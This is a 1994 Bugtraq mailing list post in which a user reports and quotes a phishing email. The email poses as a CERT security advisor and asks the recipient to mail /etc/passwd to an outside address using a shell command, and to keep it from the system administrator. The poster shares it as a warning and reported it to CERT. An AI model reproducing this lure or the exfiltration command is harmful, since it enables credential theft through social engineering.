Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Another request for passwords

From: dfloyd () paris eng utsa edu (Douglas R. Floyd)
Date: Sun, 23 Oct 1994 00:54:14 -0500

I got this in the mail today (10-23).

Seems like someone is knocking on io.com now.

(The forward to paris is normal as mail gets forwarded there.)

BEGIN FUNKY MESSAGE --------


From vanepp () sfu ca  Sun Oct 23 00:00:56 1994

Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
(931110.SGI/930416.SGI.AUTO)
        for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
Received: from trance.helix.net
        by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
        id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
From: vanepp () sfu ca
Received: from  (helix.net [142.231.37.2]) by trance.helix.net
(8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
dfloyd () pentagon io com; Sat, 22 Oct 1994 21:33:23 -0700
Message-Id: <199410230433.VAA07859 () trance helix net>
Date: Sat, 22 Oct 1994 14:22:25
To: dfloyd () pentagon io com
Subject: Very Important
Status: RO

Dear user,

    It is imperative that I attain your /etc/passwd file
immediately.  It is for security reasons.  You can mail
it to me by typing:

            mail vanepp () sfu ca < /etc/passwd

Do not tell your system administrator.  I am
conducting an investigation on your system.  Thank you

Your identity will be kept confidential.  I guarantee it

Thank you for your cooperation.

Peter Van Epp      Technical Systems Operations
                   CERT Security Advisor
                   vanepp () sfu ca


END FUNKY MESSAGE -----

I send cert () cert org a copy, as well as the admins at io.com.

I know this was posted earlier, but I think this is another address,
possibly an MX record as I could not telnet or finger sfu.ca.
Previous By Date Next
Previous By Thread Next

Current thread: